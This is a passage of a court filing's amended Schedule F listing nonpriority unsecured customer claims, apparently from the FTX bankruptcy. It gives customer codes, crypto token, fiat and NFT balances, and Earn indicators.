| 07397397 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07397398 | | BTC[0], USD[0.01] | | |
| 07397399 | | AAVE[.04327285], ALGO[44.92324925], BTC[0.00028902], CUSDT[721.02237841], DOGE[82.66947711], ETH[0.01135099], ETHW[1.56925507], KSHIB[553.68907264], MATIC[40.82904247], MKR[.00353489], SHIB[2347818.52634716], SOL[.09535526], SUSHI[2.15852641], TRX[155.2823242], UNI[.48925609], USD[0.01] | Yes | |
| 07397402 | | BRZ[1], BTC[0.03620330], CUSDT[10], DOGE[8.48828004], ETH[0.12509496], ETHW[0.12394767], GRT[1], LINK[98.60015457], LTC[2.85436984], SHIB[10244219.96773133], SOL[10.14421684], TRX[11.06486703], USD[0.00] | Yes | |
| 07397409 | | BRZ[4], CUSDT[11], DOGE[1250.3776803], TRX[2], USD[0.00], USDT[1] | | |
| 07397416 | | BTC[.00000069], CUSDT[5], USD[0.00] | Yes | |
| 07397418 | | TRX[.236843], USD[1.02] | | |
| 07397419 | | CUSDT[2], DOGE[9], ETH[.34638259], ETHW[.34638259], LINK[31.22770758], TRX[2], USD[0.58] | | |
| 07397420 | | DOGE[941.058], USD[50.05] | | |
| 07397434 | | CUSDT[8], DOGE[1], TRX[626.01901283], USD[0.00] | | |
| 07397446 | | BTC[.00019302], USD[0.00] | | |
| 07397451 | | USD[0.01], USDT[0] | | |
| 07397453 | | ETH[.07945058], LINK[.00000001], NEAR[99.04526863], SHIB[2.00000001], USD[0.00], USDT[0] | Yes | |
| 07397456 | | AVAX[8.29389626], DOGE[1307.86152331], NEAR[82.23824139], SHIB[6], USD[0.27] | Yes | |
| 07397457 | | BTC[.0052135], CUSDT[1], DOGE[5], TRX[3], USD[0.00] | | |
| 07397458 | | BTC[.00177187], CUSDT[1], DOGE[1792.01479626], TRX[2], USD[0.00] | | |
| 07397461 | | USD[0.01] | | |
| 07397465 | | CUSDT[1], DOGE[1], LINK[.0000156], USD[0.00] | | |
| 07397467 | | CUSDT[2], TRX[396.46887391], USD[0.00] | | |
| 07397469 | | CUSDT[12], DOGE[3179.99088992], USD[0.00] | Yes | |
| 07397480 | | USD[0.03], USDT[0] | | |
| 07397487 | | BAT[84.69945752], CUSDT[2], DOGE[9], GRT[36.69891979], LINK[1.56583052], SOL[5.99642257], SUSHI[5.06696996], TRX[164.83499818], UNI[2.4061158], USD[100.00] | | |
| 07397490 | | BTC[.00086501], CUSDT[1], DOGE[49.76519871], SOL[4.60265717], USD[0.00] | | |
| 07397491 | | BTC[.00223301], DOGE[3], SUSHI[7.77537865], TRX[6.36094998], USD[0.03] | Yes | |
| 07397502 | | USD[0.00] | Yes | |
| 07397503 | | TRX[3], USD[0.00], USDT[0] | | |
| 07397504 | | BTC[0.00069933], USDT[1.58] | | |
| 07397511 | | CUSDT[4], USD[0.00] | | |
| 07397524 | | USD[0.03] | | |
| 07397526 | | ETH[.000581], ETHW[.000581], GRT[.673], LINK[.0185], SHIB[9885500], SOL[.00753], SUSHI[.3185], USD[10967.68] | | |
| 07397531 | | BTC[0], NFT [398777793923376879/Sigma Shark #1189][1], NFT [551001411336590825/Megalodon Rogue Shark Tooth][1], NFT [564779015079409290/Ravager #1180][1], SHIB[54902.36213083], SOL[0.00197556], USD[327.95], USDT[.14253546] | | |
| 07397532 | | USD[5.00] | | |
| 07397533 | | CUSDT[11], DOGE[1749.52592027], ETH[.00000242], ETHW[0.00000241], SHIB[1682296.76844447], SUSHI[14.91796192], TRX[2], USD[0.00] | Yes | |
| 07397535 | | CUSDT[1], TRX[3], USD[0.01] | | |
| 07397537 | | BRZ[2], BTC[.0009103], CUSDT[12], DOGE[4819.24808485], SHIB[17764759.61215096], TRX[2], USD[0.13] | Yes | |
| 07397547 | | USD[0.00], USDT[0] | | |
| 07397548 | | TRX[1], USD[0.00], USDT[0] | Yes | |
| 07397551 | | BAT[509.87950599], SOL[3.08501], USD[0.00] | | |
| 07397555 | | BTC[0.00000416], DOGE[70377.91811690], LTC[30], SOL[60.4559], SUSHI[.172], TRX[23830.8513157], USD[0.36], USDT[5.7791871] | | |
| 07397556 | | USD[0.02] | | |
| 07397558 | | USD[0.00] | | |
| 07397561 | | TRX[1], USD[0.17] | | |
| 07397569 | | TRX[17219.56039205], USD[0.00] | | |
| 07397574 | | USD[0.02] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07397575 | | AAVE[.08961759], BRZ[1], CUSDT[22], DOGE[7067.07714263], ETH[0.11399183], ETHW[0.11287516], GRT[1], LTC[.04172807], MATIC[1271.70681886], SHIB[2595646.6164243], SOL[32.23609502], SUSHI[3.87897941], TRX[4], USD[0.00], USDT[1.06759018] | Yes | |
| 07397578 | | BAT[4.14309302], BRZ[27.15221357], BTC[.00000011], CUSDT[1], DOGE[83.60181486], ETH[.00002429], ETHW[.00002429], GRT[3], NFT (305358144592717459/ApexDucks #5787)[1], NFT (316033778666043424/ApexDucks #3691)[1], NFT (330624847639521622/ApexDucks #8246)[1], NFT (347878004941757526/ApexDucks #14)[1], NFT (382941119906943888/ApexDucks #2179)[1], NFT (385764058580961779/ApexDucks #2441)[1], NFT (406585010064491867/ApexDucks #7409)[1], NFT (459818438861921224/ApexDucks #997)[1], NFT (461525325432759921/Entrance Voucher #2351)[1], NFT (476242275507200944/ApexDucks Halloween #1961)[1], NFT (568675329685738930/ALPHA:RONIN #74)[1], SHIB[4368020.20769272], SOL[1.97710149], SUSHI[4.63123042], TRX[90.96932038], USD[0.00], USDT[4.19313298] | Yes | |
| 07397580 | | BTC[0], DOGE[.1359], ETH[.00058616], LTC[.00271797], SUSHI[.25000001], USD[0.00], USDT[17.24412000] | | |
| 07397582 | | DOGE[143.33240534], TRX[149.41081571], USD[0.00] | | |
| 07397584 | | BTC[.00037809], CUSDT[476.74386381], DOGE[5365.98385153], ETH[.00569437], ETHW[.00569437], LINK[2.06563717], LTC[1.13832732], PAXG[.00538995], SOL[3.63383953], TRX[201.39718243], USD[0.00], USDT[64.71203625], YFI[.0002469] | | |
| 07397586 | | DOGE[199.73812473], USD[0.00] | Yes | |
| 07397588 | | BRZ[1], CUSDT[2], TRX[2], USD[0.00] | | |
| 07397596 | | BTC[0], DOGE[0], GRT[0], SOL[0], SUSHI[0], UNI[0], USD[0.05], USDT[0] | Yes | |
| 07397598 | | DOGE[1], USD[0.00] | | |
| 07397601 | | BRZ[1], DOGE[1], USD[0.01] | | |
| 07397606 | | DOGE[0], SHIB[768.54623296], SUSHI[0.00280420], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07397612 | | CUSDT[1], DOGE[1], TRX[1], USD[82.41] | | |
| 07397613 | | BRZ[0], CUSDT[3.02466054], KSHIB[860.00282077], USD[2.78] | | |
| 07397616 | | USD[0.80] | | |
| 07397620 | | DAI[4.88657026], DOGE[3711.60000850], SHIB[1], USD[31.46] | Yes | |
| 07397621 | | ETHW[.747], USD[0.00], USDT[0] | | |
| 07397623 | | BRZ[2], CUSDT[1], TRX[2], USD[0.00] | | |
| 07397625 | | CUSDT[3], USD[0.00] | | |
| 07397636 | | ETH[0], LINK[0], LTC[0], USD[0.00] | | |
| 07397641 | | CUSDT[1], USD[0.01] | | |
| 07397648 | | USD[0.00] | Yes | |
| 07397649 | | BTC[0], DOGE[0], ETH[0.00009631], ETHW[0.00009631], USD[0.00], USDT[0] | | |
| 07397662 | | DOGE[10.71484139], NFT (518483387703314072/Saudi Arabia Ticket Stub #760)[1], SHIB[22122.11305389], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07397665 | | BRZ[1], CUSDT[1], TRX[1], USD[0.13] | | |
| 07397669 | | CUSDT[2], TRX[2], USD[0.01] | | |
| 07397673 | | DOGE[1], LTC[0], USD[0.00] | Yes | |
| 07397674 | | BTC[0.00005053], ETH[.000021], ETHW[.000021], USD[1.09], USDT[0] | | |
| 07397675 | | SUSHI[.12], USD[2.03] | | |
| 07397676 | | BAT[82.49935251], BCH[.31312958], CUSDT[20], DOGE[956.70411041], ETH[.05611546], ETHW[.05541778], GRT[174.39588321], KSHIB[7572.14110169], LINK[6.80488804], LTC[.92011171], MATIC[48.57893525], SHIB[1], SOL[1.10062349], SUSHI[13.27970257], TRX[3315.89283708], UNI[11.34387607], USD[0.00] | Yes | |
| 07397677 | | BAT[25.09517618], BRZ[3], BTC[.00378582], CUSDT[27], DOGE[5072.28633808], KSHIB[506.71683568], SOL[4.88875018], TRX[2238.99032878], USD[0.00], USDT[0] | Yes | |
| 07397685 | | ETH[0], USD[0.00] | | |
| 07397688 | | TRX[891.5] | | |
| 07397689 | | BAT[0], BCH[0], BRZ[0], CUSDT[2], DOGE[0], GRT[0], LTC[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07397693 | | CUSDT[1], DOGE[70.10963227], TRX[2], USD[1224.20], USDT[.9951035] | | |
| 07397694 | | BAT[0], BRZ[0], BTC[0], DOGE[0], PAXG[0], SUSHI[0], UNI[0], USD[0.00], YFI[0] | | |
| 07397704 | | USD[0.00], USDT[9.94805028] | | |
| 07397711 | | BRZ[0], CUSDT[1], DOGE[0], LTC[0], USD[0.00], USDT[0] | | |
| 07397719 | | USD[0.00], USDT[0] | | |
| 07397725 | | BAT[0], BCH[0], BTC[0], CUSDT[0], DAI[0], DOGE[0.00270438], ETH[0.00000402], ETHW[0], LINK[0], LTC[0], SHIB[30685.01446321], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07397728 | | CUSDT[0], DOGE[0.10196794], ETH[0], GRT[0], LTC[0], PAXG[0], TRX[0], USD[0.00], USDT[0] | | |
| 07397730 | | BTC[0], USD[0.00] | | |
| 07397733 | | BRZ[2], CUSDT[1], DOGE[1436.09483778], USD[0.00] | Yes | |
| 07397734 | | ETH[.00043848], ETHW[.00043848], USD[0.00], USDT[0.25835056] | | |
| 07397736 | | DOGE[.8304029], SOL[0], USD[1.20] | | |
| 07397737 | | BRZ[1], CUSDT[2], DOGE[3], TRX[.00006228], USD[0.00] | | |
| 07397740 | | BTC[.00000015], USD[0.00] | | |
| 07397745 | Contingent, Disputed | USD[0.01], USDT[0.00000001] | Yes | |
| 07397747 | | BCH[0], DOGE[1], ETH[0.30891375], ETHW[0.30872763], SHIB[805265.27925507], SOL[15.48188625], SUSHI[0], USD[0.58], USDT[0.00001389] | Yes | |
| 07397773 | | CUSDT[2], DOGE[0], USD[0.00] | | |
| 07397776 | | USD[0.01], USDT[1.29734642] | | |
| 07397798 | | GRT[0], USD[0.00], USDT[0] | | |
| 07397801 | | CUSDT[950.51650257], DOGE[283.19332927], USD[0.00] | | |
| 07397807 | | BTC[0], ETH[0], LINK[0], SOL[0], TRX[0] | | |
| 07397809 | | CUSDT[2], DAI[0], DOGE[2], LTC[0], TRX[2], USD[0.00], USDT[0] | | |
| 07397816 | | TRX[827.90051218], USD[0.05] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07397820 | | DOGE[22966.55283656], SHIB[1], SOL[11.49345712], TRX[2], USD[0.00] | Yes | |
| 07397821 | | CUSDT[3], DOGE[57.36733342], ETH[.01372579], ETHW[.01372579], USD[0.49] | | |
| 07397825 | | BRZ[3], CUSDT[13], DOGE[20537.5185562], TRX[4], USD[869.00] | | |
| 07397826 | | BAT[64.6400216], BRZ[1], BTC[.02712396], CUSDT[15], DOGE[1], ETH[.3799143], ETHW[.3799143], GBP[0.00], GRT[16.40970347], LINK[1.39172402], TRX[841.89492242], UNI[1.79479783], USD[0.00] | | |
| 07397829 | | ETHW[.635], NFT (410948942711581874/Common Cryptogram)[1], NFT (542755293425278723/Entrance Voucher #29645)[1], NFT (554565202497083673/Ex Populus Trading Card Game)[1], NFT (561479890297715881/Common Cryptogram)[1], USD[0.93] | | |
| 07397830 | | BAT[1], BRZ[2], CUSDT[4], TRX[1], USD[0.00] | | |
| 07397833 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07397836 | | BRZ[1], CUSDT[1], DOGE[1217.01922187], TRX[1186.65586339], USD[0.00] | | |
| 07397840 | | LTC[0], SOL[0], USD[0.34] | | |
| 07397847 | | USD[0.00], USDT[0] | | |
| 07397851 | | DOGE[1.00001811], TRX[.00057026], USD[0.58], USDT[0.00005028] | | |
| 07397857 | | CUSDT[1], USD[0.01] | | |
| 07397860 | | BAT[4.22839766], BRZ[5.0724849], CUSDT[22], DOGE[12.18843318], ETH[0], ETHW[0], GRT[1], SHIB[2], TRX[9], USD[0.00], USDT[0.00002523] | Yes | |
| 07397862 | | USD[0.00] | | |
| 07397864 | | CUSDT[2], DOGE[.00000004], TRX[1.9], USD[0.00] | | |
| 07397869 | | CUSDT[0], DOGE[0], GRT[0], USD[2.48] | | |
| 07397870 | | BAT[0], BCH[0], BTC[0], DOGE[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07397873 | | BTC[.00002611], ETH[.000932], ETHW[.000932], GRT[.768], LINK[.099], LTC[.00988], SOL[.064], USD[62.63] | | |
| 07397874 | | CUSDT[1], DOGE[33.89470461], USD[0.00], USDT[0] | | |
| 07397879 | | USD[0.08] | | |
| 07397885 | | BTC[.04535769], CUSDT[4], DOGE[12.21036943], ETH[0.02718133], ETHW[0.02683933], TRX[2], USD[525.40] | Yes | |
| 07397886 | | AAVE[0.00934999], BTC[0.00007591], DOGE[0.14909542], ETH[0.00055203], ETHW[0.00055203], GRT[.32], SOL[0.00321477], SUSHI[5.6707], USD[2824.08], USDT[ 1091315] | | |
| 07397887 | | USD[0.00] | | |
| 07397889 | | BRZ[1], DOGE[1], GRT[419.29411558], USD[0.00] | | |
| 07397891 | | BTC[0.00017190], ETH[.016623], ETHW[.016623], USD[1.03] | | |
| 07397892 | | BTC[0], ETH[0], LTC[0], SOL[0], USD[0.05], USDT[0.00000001] | | |
| 07397897 | | BAT[1], BRZ[3], CUSDT[6], DOGE[2], ETH[0], GRT[1], TRX[5], USD[0.00], USDT[2] | | |
| 07397909 | | DAI[.00304915], DOGE[1], TRX[0] | | |
| 07397911 | | DOGE[1], UNI[7.28928286], USD[0.00] | | |
| 07397924 | Contingent, Disputed | USD[0.00] | | |
| 07397925 | | USD[0.00], USDT[0.00000001] | Yes | |
| 07397930 | | DOGE[0], GRT[0], SOL[0.00000001], USD[0.00], USDT[0] | | |
| 07397934 | | SHIB[3468.09250398], USD[0.00], USDT[0] | | |
| 07397937 | | CUSDT[7], USD[0.01] | | |
| 07397938 | | AAVE[.12837607], AVAX[1.17248438], BAT[221.94575645], BCH[.05848181], BF_POINT[300], CUSDT[38], DOGE[8368.91709345], ETH[.06027336], ETHW[.05952327], GRT[11.93634744], KSHIB[542.54290551], LINK[.7347427], LTC[.4500971], MATIC[441.81959256], MKR[.01078517], NEAR[1.59409727], SHIB[169783263.62058716], SOL[17.02498184], SUSHI[32.68349832], TRX[5264.36346351], UNI[8.53279669], USD[267.05], YFI[.00086208] | Yes | |
| 07397940 | | BTC[0], DOGE[77.684], ETH[.000953], ETHW[.000953], SOL[.00222961], USD[0.06] | | |
| 07397942 | | CUSDT[2], DOGE[3], ETH[2.00138658], ETHW[2.00138658], GRT[1], LINK[2.03534595], SOL[1.00046683], TRX[2], USD[0.00], USDT[1] | | |
| 07397944 | | AAVE[.31216009], ALGO[147.14751908], AVAX[1.32190898], BAT[74.09924068], BCH[.08321897], BRZ[1], BTC[.00991703], CUSDT[370.44187708], DOGE[13504.20104644], ETH[.1211462], ETHW[.11157866], GRT[194.55005708], KSHIB[2108.55504857], LINK[1.98056234], LTC[2.76174801], MATIC[597.90538449], MKR[.00972005], NEAR[1.61458622], NFT (367431262499475745/Entrance Voucher #2503)[1], SHIB[133176097.10304766], SOL[13.42842507], SUSHI[27.47274839], TRX[4954.60681384], UNI[1.94788678], USD[142.74], USDT[0], YFI[.00136005] | Yes | |
| 07397949 | | BRZ[2], CUSDT[12], DOGE[5100.85263901], KSHIB[3455.43513791], TRX[2682.96856011], USD[0.00], USDT[1] | | |
| 07397950 | | DOGE[1], TRX[1921.15392189], USD[0.00] | | |
| 07397952 | | BRZ[1], DOGE[1581.41685475], SHIB[798183.06250433], TRX[556.69200615], USD[0.01] | Yes | |
| 07397953 | | BTC[0], DOGE[.694], SOL[.0059], USD[0.00], USDT[2.29092375] | | |
| 07397955 | | BTC[.00410551], DOGE[1654.90431402], TRX[1], USD[0.00] | | |
| 07397957 | | DOGE[1], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07397964 | | SOL[0], USD[2959.53] | | |
| 07397966 | | AAVE[.00756], BTC[0], DOGE[.776], LINK[.067], MKR[.000344], SOL[.0076], SUSHI[.216], USD[2.69], USDT[1.0957451] | | |
| 07397969 | | CUSDT[1], DOGE[0], SHIB[1397528.15160591], USD[0.00], USDT[0] | Yes | |
| 07397972 | | USD[0.05] | | |
| 07397973 | | BRZ[1], CUSDT[1], DOGE[0], ETH[.00000001], USD[0.01] | | |
| 07397985 | | ETH[0], ETHW[0], USD[14.02] | | |
| 07397989 | | BRZ[2], CUSDT[4], USD[0.01] | | |
| 07397990 | | CUSDT[1], DOGE[3.000548], TRX[2], USD[0.00] | Yes | |
| 07397995 | | DOGE[1], SUSHI[1.12296253], USD[0.00] | | |
| 07398010 | | BTC[.00000001], ETH[.00000001], ETHW[0], USD[1064.10], USDT[0.00000001] | Yes | |
| 07398014 | | BTC[0], DOGE[0], USD[0.00] | | |

Amended Schedule F Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07398018 | | DOGE[112.6] | | |
| 07398022 | | BTC[0], ETH[.0009832], ETHW[.0009832], GRT[.4046], LTC[.00315], USD[0.11] | | |
| 07398026 | | DOGE[1], USD[0.00] | | |
| 07398029 | | BRZ[1], CUSDT[5], DOGE[1], TRX[2], USD[0.01] | Yes | |
| 07398031 | | CUSDT[1], DOGE[7], USD[0.00] | | |
| 07398037 | | USD[0.00] | | |
| 07398038 | | CUSDT[3], DOGE[1962.22515492], TRX[1], USD[0.00] | | |
| 07398045 | | CUSDT[1], DOGE[.00112962], SOL[0.41567991], USD[0.00] | | |
| 07398052 | | AUD[0.00], BAT[1.01655549], BRZ[1], BTC[0], CAD[0.00], CUSDT[41], DOGE[2], ETH[0], EUR[0.00], GBP[0.00], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07398054 | | SOL[0], TRX[0.63797612], USD[0.00] | | |
| 07398062 | | DOGE[1], GRT[23.25550189], USDT[0] | | |
| 07398064 | | CUSDT[0], DOGE[0], LINK[0], LTC[0], TRX[1], USD[0.00], USDT[0] | | |
| 07398065 | | BRZ[1], USD[0.00] | Yes | |
| 07398066 | | CUSDT[1], TRX[3255.51166394], USD[0.00] | Yes | |
| 07398067 | | BRZ[1], CUSDT[6], DOGE[1997.69238756], SHIB[24987.46715175], TRX[1], USD[0.00] | | |
| 07398069 | | DAI[0], ETH[0], LTC[0], SOL[0], USD[0.00], USDT[0.00002846] | | |
| 07398073 | | BTC[0], SOL[.00000001], USD[0.00], USDT[0] | | |
| 07398076 | | BRZ[1], CUSDT[3], DOGE[1], SOL[0], USD[0.00] | | |
| 07398082 | | BTC[0], ETH[0], ETHW[0], USD[531.75] | | |
| 07398084 | | BAT[2.12497227], BRZ[3], CUSDT[6], GRT[1.00498957], LTC[.01646633], SOL[14.69366161], TRX[6], USD[2.95], USDT[15.15198050] | Yes | |
| 07398087 | | BTC[0], USD[0.01], USDT[0] | | |
| 07398089 | | BRZ[4], CUSDT[2], DOGE[4], GRT[1.00019173], NFT (567489461690405144/Coachella x FTX Weekend 1 #17990)[1], SOL[.00019681], TRX[1], USD[0.12], USDT[0] | Yes | |
| 07398092 | | LTC[.009], TRX[.044], USD[1.74] | | |
| 07398093 | | AVAX[0], BAT[2.00838285], BRZ[1], BTC[0], DOGE[1], LINK[.00000001], SHIB[4], SOL[0], USD[0.00] | Yes | |
| 07398094 | | TRX[1] | | |
| 07398095 | | DOGE[.87], SUSHI[.258], USD[2.81] | | |
| 07398097 | | ETH[.00027236], ETHW[.00027236], USD[0.00] | | |
| 07398099 | | BF_POINT[100], BTC[0], DOGE[1], ETH[.00002307], TRX[1], USD[0.00] | Yes | |
| 07398101 | | CUSDT[231.73916878], DOGE[383.00536543], KSHIB[331.29827844], SHIB[337154.41672285], USD[5.00] | | |
| 07398103 | Contingent, Disputed | BTC[0], ETH[0], MATIC[0], SOL[0], USD[0.00], USDT[0.00554103] | Yes | |
| 07398105 | | BTC[0.00743502], SOL[637.87575654], SUSHI[0], USD[0.00] | | |
| 07398106 | | USD[1.29] | | |
| 07398113 | | BAT[179.30975772], KSHIB[247.77731268], LINK[0], SOL[0], SUSHI[0], TRX[1], UNI[12.91032085], USD[0.00], USDT[0] | Yes | |
| 07398119 | | BTC[0], USD[0.07] | | |
| 07398125 | | SHIB[2393.82274426], USD[0.00] | | |
| 07398132 | | BAT[1.01510836], BCH[.02471661], BRZ[4], CUSDT[57.89332218], DOGE[361.23481261], ETH[.00281438], ETHW[.04262535], GRT[1], KSHIB[118.77146126], LINK[1.07427605], MATIC[8.76002707], SHIB[554279.04901081], SUSHI[1.35963874], TRX[527.56684465], USD[0.01] | Yes | |
| 07398133 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], TRX[1], USD[0.00], USDT[0] | | |
| 07398134 | | SOL[0] | | |
| 07398143 | | BRZ[1], CUSDT[8], DOGE[4.04485404], TRX[2], USD[0.00] | Yes | |
| 07398147 | | BRZ[1], CUSDT[1], DOGE[1], TRX[0], USD[0.00] | | |
| 07398148 | | BTC[0.00240141], DOGE[112.22865928] | | |
| 07398149 | | ETH[.217], ETHW[.217], USD[4.91] | | |
| 07398152 | | ETHW[4.32326955], SHIB[2], USD[0.00] | | |
| 07398153 | | GRT[2315.682], MATIC[26670.10667825], NFT (353959832124857609/Entrance Voucher #3690)[1], SOL[445.43], SUSHI[493.02788851], UNI[318.40988031], USD[0.00], USDT[4.15946638] | | |
| 07398164 | | BRZ[2], SHIB[125.01678859], USD[91.57] | Yes | |
| 07398166 | | BRZ[1], CUSDT[157.0453939], TRX[3], USD[0.19], USDT[1.10425225] | Yes | |
| 07398167 | | CUSDT[4], DOGE[177.68383791], TRX[460.79074739], USD[0.15] | | |
| 07398169 | | USD[0.00], USDT[0] | | |
| 07398170 | | BRZ[0], BTC[0.00015843], CUSDT[7], DOGE[0], LTC[0], USD[0.00] | Yes | |
| 07398171 | | BTC[.0771963], ETH[1.23700001], ETHW[0.67300000], LINK[76.4], MATIC[200], SOL[16.11], USD[447.82], USDT[0] | | |
| 07398172 | | SHIB[3], USD[1.43712618], USD[0.00] | Yes | |
| 07398176 | | CUSDT[1], DOGE[10097.41747872], TRX[2425.48972219], USD[0.00] | | |
| 07398178 | | BAT[0], BRZ[1], BTC[.0000335], CUSDT[1], DOGE[2], LINK[0], TRX[1], USDT[1] | | |
| 07398180 | | BF_POINT[12100], USD[47.26] | | |
| 07398182 | | DOGE[0], USD[0.00] | | |
| 07398191 | | TRX[0], USD[0.00] | | |
| 07398198 | | BTC[0], CUSDT[1], DOGE[2], SOL[0.00002124], TRX[2.09998248], USD[0.00] | Yes | |
| 07398199 | | SOL[0], USD[38.22] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07398203 | | CUSDT[1], DOGE[151.41633059], USD[0.00] | Yes | |
| 07398212 | | DOGE[1655.12563745], USD[0.00] | | |
| 07398214 | | BTC[0.00466021], DOGE[.84805325], ETH[.226773], ETHW[.226773], LINK[9.99], USD[3.39] | | |
| 07398216 | | BTC[.00081744] | | |
| 07398217 | | ETH[.29801865], ETHW[1.09801865], USD[0.34], USDT[0] | | |
| 07398226 | | DOGE[832.04505078], USD[0.00] | | |
| 07398228 | | DOGE[727.68945673], SUSHI[.24623947], USD[8.74], USDT[14.3045138] | | |
| 07398229 | | DOGE[.751], TRX[.252], UNI[.038], USD[2.31], USDT[.2686635] | | |
| 07398230 | | CUSDT[1], DOGE[3], USD[0.00] | | |
| 07398233 | | SHIB[2], USD[0.00] | Yes | |
| 07398238 | | DOGE[474.26954554], USD[0.00] | | |
| 07398247 | | USD[0.00] | | |
| 07398251 | | DOGE[7642.2302095], USD[0.00] | | |
| 07398260 | | CUSDT[1], DOGE[.00582342], TRX[.0000267], USD[0.22], USDT[0.00003437] | | |
| 07398263 | | USD[0.01] | | |
| 07398266 | | BAT[1.04288623], DOGE[16.79119859], TRX[18.46658584], USD[0.00] | | |
| 07398269 | | BRZ[5], DOGE[655.87687201], GRT[1], LTC[0.15524937], SHIB[81], TRX[11], USD[0.06] | Yes | |
| 07398274 | | BRZ[2], BTC[.00010942], CUSDT[1], GRT[1349.3960047], TRX[2], USD[0.00], USDT[1] | | |
| 07398275 | | BTC[0], CUSDT[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07398280 | | BF_POINT[300], BRZ[1], BTC[0], CUSDT[9], DOGE[5], ETH[0], SHIB[.00000002], SOL[.00089822], TRX[7.03196947], USD[0.00] | Yes | |
| 07398283 | | BAT[0], BTC[0.04245036], DOGE[0], ETH[0], ETHW[420.23222488], GRT[22754.54358754], NEAR[804.68382835], SHIB[112359.62752161], SOL[0], USD[110.30], USDT[0] | Yes | |
| 07398289 | | TRX[1], USD[24.76] | | |
| 07398290 | | CUSDT[3], DOGE[4.01966454], USD[0.00] | Yes | |
| 07398293 | | BTC[0], USD[0.00] | | |
| 07398297 | | BTC[.00061253], USD[4964.18], USDT[9.47697844] | Yes | |
| 07398301 | | USD[0.01] | | |
| 07398302 | | DOGE[1418.04975263], TRX[1], USD[0.00] | | |
| 07398303 | | BCH[.000715], BTC[0.24254820], ETH[.000971], ETHW[.000971], LINK[.0764], LTC[.00072], SOL[26.0593], SUSHI[.1148], TRX[.624], UNI[.0248], USD[0.00], YFI[.000552] | | |
| 07398314 | | USD[0.00] | | |
| 07398317 | | SOL[.08] | | |
| 07398319 | | AAVE[0], BTC[0], CUSDT[5], DOGE[4], SHIB[1], SOL[0.61546261], TRX[2], USD[0.00] | | |
| 07398321 | | ALGO[735.67773593], BAT[0], BRZ[2], CUSDT[2], DOGE[1], ETH[.00000001], ETHW[0.26142648], LINK[67.77877681], SHIB[3], SOL[0], TRX[7], USD[0.00], USDT[0] | Yes | |
| 07398324 | | DOGE[240.4501], ETH[1.64325095], ETHW[1.64325095], TRX[8258.1698], USD[0.16] | | |
| 07398335 | | DOGE[.00981296], ETH[.20604642], TRX[1], USD[0.95] | | |
| 07398337 | | CUSDT[1], SHIB[467379.35262155], USD[0.00] | Yes | |
| 07398338 | | BRZ[0], CUSDT[1], SHIB[5491.76157414], USD[0.00] | Yes | |
| 07398343 | | DOGE[.00099658], SHIB[1], USD[89.13] | | |
| 07398345 | | DOGE[1750.26797508], USD[0.00] | | |
| 07398346 | | USD[1992.21] | | |
| 07398348 | | USD[0.01], USDT[0.00000001] | | |
| 07398350 | | BAT[0], BTC[0], CUSDT[2], DOGE[0], ETH[0], ETHW[0], TRX[1], UNI[0], USD[0.00] | | |
| 07398355 | | BTC[.00000498], USD[0.00] | | |
| 07398359 | | BTC[0], TRX[.000001], USD[0.00], USDT[0.00000027] | | |
| 07398365 | | DOGE[2083.98139626], ETH[.06189583], ETHW[.06189583], TRX[1], USD[0.00] | | |
| 07398368 | | CUSDT[1], GRT[59.03127574], USD[0.00] | | |
| 07398369 | | BAT[1], BRZ[1], CUSDT[1], DOGE[3], ETH[.13798477], ETHW[.13693531], LINK[3.31738699], TRX[2], USD[0.00], USDT[1.10569534] | Yes | |
| 07398376 | | CUSDT[5], DOGE[.40015524], TRX[.00056071], USD[0.01] | Yes | |
| 07398382 | | BTC[0.02031997], USDT[4.61624244] | | |
| 07398384 | | CUSDT[1], DOGE[10692.89461822], TRX[3], USD[835.71] | | |
| 07398385 | | BTC[0.00000895], DOGE[0], USD[0.00] | Yes | |
| 07398391 | | CUSDT[5], USD[0.01] | | |
| 07398393 | | BTC[.00174561], NFT [535051002852747346/Entrance Voucher #3528][1], SHIB[4], TRX[1], USD[0.00] | Yes | |
| 07398394 | | CUSDT[1], DOGE[1], USD[0.64] | | |
| 07398395 | | BTC[0], DOGE[0], ETH[0], ETHW[0.83874591], LINK[0], LTC[0], PAXG[.00004719], SOL[0], USD[0.58], USDT[0] | | |
| 07398397 | | USD[92.19] | | |
| 07398399 | | BAT[1], BRZ[1], DOGE[1598.84761742], ETH[3.04059522], GRT[2.0013521], LTC[32.01864808], SHIB[7111619.99401887], TRX[7.43271164], USD[0.04], USDT[1.01988447] | Yes | |
| 07398405 | | DOGE[5584.05797463], TRX[1], USD[0.00] | | |
| 07398409 | | CUSDT[3], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07398410 | | BTC[0], DOGE[0], ETH[0], SUSHI[0], USD[0.00] | | |
| 07398413 | | BRZ[1], BTC[.00205824], CUSDT[22], DOGE[23.29910132], ETH[.10012352], ETHW[.09909075], LINK[3.49822286], SOL[52.69484827], SUSHI[29.31559133], UNI[4.81285612], USD[666.00] | Yes | |
| 07398417 | | SOL[0], USD[0.00] | | |
